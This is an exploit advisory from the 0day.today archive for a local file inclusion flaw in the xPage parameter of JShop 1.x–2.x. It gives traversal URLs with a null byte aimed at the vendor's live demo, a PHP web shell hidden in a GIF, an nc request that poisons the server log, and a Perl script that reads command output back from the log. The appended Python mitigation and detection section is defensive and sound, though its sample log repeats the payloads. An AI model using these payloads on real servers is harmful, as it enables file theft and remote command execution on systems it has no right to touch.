JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability
2008-03-30T00:00:00
ID 1337DAY-ID-2788 Type zdt Reporter v0l4arrra Modified 2008-03-30T00:00:00
Description
Exploit for unknown platform in category web applications
===================================================================
JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability
===================================================================
JShop 1.x-2.x local file include
---------------------------------------------------------------------------------------------------------------------
+ scripts: Jshop Server 1.x-2.x +
+ Discovered By : v0l4arrra +
+ url: www.jshop.co.uk +
+ dork: "powered by jshop" and also a useful one: "allinurl:jssCart=.." +
---------------------------------------------------------------------------------------------------------------------
Go to www.jshop.co.uk and check out the demo version...
http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../../../../etc/passwd%00
Then you can upload, for example, a GIF file like this:
$cat 1.gif
GIF89aD
<?php echo system($_GET['cmd']); ?>
or do it like me:
$nc www.jshopecommerce.com 80
GET <?php echo '<start>'; echo system($_GET['cmd']); echo '</start>'; ?> HTTP/1.1
Host: www.jshopecommerce.com
................................................................................................................
and simply parse the output from the error log with this lame Perl script:
#!/usr/bin/env perl
use strict; use warnings;

#####################################
# This script downloads a log file  #
# and greps the result of the       #
# command in tags <start>..</start> #
# and prints it..                   #
#####################################

use LWP::UserAgent;
use HTTP::Request;

$| = 1;

my $url = $ARGV[0] or print "usage: $0 http://127.0.0.1/vuln.php?page=../../../../../var/log/access.log%00&cmd=ls+-lisa\n" and exit;
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0");
my $request = HTTP::Request->new('GET' => $url);
my $document = $ua->request($request);
my $response = $document->as_string;
# Print only the text between the <start>..</start> markers; say so when they are absent.
if ($response =~ m%<start>(.*?)</start>%is) {
    print $1, "\n";
} else {
    print "no <start>..</start> markers found in the response\n";
}
######################################
so don't waste your time and check it now:
http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../etc/httpd/logs/error_log%00&cmd=ls+-lisa
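As an added, defender-side example (not part of the original advisory and not JShop's code), the Python below shows two things the advisory implies but does not spell out: how a page.php-style include should resolve its xPage parameter so that traversal and the %00 truncation trick cannot reach /etc/passwd or the web-server log, and how to spot in an access log the two request shapes the write-up relies on (a traversal-plus-null-byte path into a sensitive file, and a PHP tag sent in the request line to poison that log). The allowlist, the base directory and the sample log lines are constructed for this example.

```python
import os
import re
from urllib.parse import unquote

# --- Mitigation: resolve a requested page name without trusting the client ---

# Constructed allowlist for this example: the page names the shop actually
# serves. Anything not listed is rejected before any path is built.
ALLOWED_PAGES = {"home", "contact", "terms"}

def safe_resolve_page(base_dir, requested):
    """Map the xPage-style parameter `requested` to a file under base_dir.

    Returns the absolute path, or None when the value carries a null byte,
    traversal, or a name outside the allowlist. A final realpath check
    guarantees the result never escapes base_dir, even via symlinks.
    """
    if not requested:
        return None
    name = unquote(requested)                  # %00 and %2e%2e become literal here
    if "\x00" in name or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name):
        return None
    if name not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

# --- Detection: flag LFI and log-poisoning indicators in access-log lines ---

# Apache/nginx "combined"-style line: ip ident user [ts] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SENSITIVE_RE = re.compile(r"/etc/passwd|/proc/self/environ|/(?:access|error)_?log\b", re.I)
PHP_TAG_RE = re.compile(r"<\?php|<\?=", re.I)

def classify_request(raw_request):
    """Return the set of indicator tags for one raw request line."""
    decoded = unquote(unquote(raw_request))    # catch single and double URL encoding
    tags = set()
    if "\x00" in decoded:
        tags.add("null-byte")                  # truncation trick that drops the .php suffix
    if TRAVERSAL_RE.search(decoded):
        tags.add("traversal")
    if SENSITIVE_RE.search(decoded):
        tags.add("sensitive-path")             # passwd, environ, or the log files themselves
    if PHP_TAG_RE.search(decoded):
        tags.add("php-tag")                    # PHP code in a request line: log poisoning
    return tags

def scan_log(lines):
    """Return one finding per log line that carries at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("req"))
        if tags:
            findings.append({"ip": m.group("ip"), "status": m.group("status"),
                             "request": m.group("req"), "tags": sorted(tags)})
    return findings

# Constructed sample log (not a real capture) mirroring the requests shown in the advisory.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Mar/2008:10:00:01 +0000] "GET /page.php?xPage=home HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Mar/2008:10:00:02 +0000] "GET /page.php?xPage=../../../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '203.0.113.7 - - [30/Mar/2008:10:00:03 +0000] "GET <?php system($_GET[\'cmd\']); ?> HTTP/1.1" 400 226',
    '203.0.113.7 - - [30/Mar/2008:10:00:04 +0000] "GET /page.php?xPage=../../../../etc/httpd/logs/error_log%00&cmd=id HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["tags"], f["request"])
    print(safe_resolve_page("/var/www/pages", "home"))
    print(safe_resolve_page("/var/www/pages", "../../../../etc/passwd%00"))
```

The resolver deliberately maps names to files through an allowlist rather than trying to strip `../` from the input: filtering the string is what null-byte and double-encoding tricks defeat, whereas an allowlist plus a realpath containment check leaves nothing for the attacker to encode around. On the detection side, a PHP tag inside a request line is a strong indicator on its own, because the only reason to send one is to get it written into a log that is later included.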
##########################################
# 0day.today [2018-03-19] #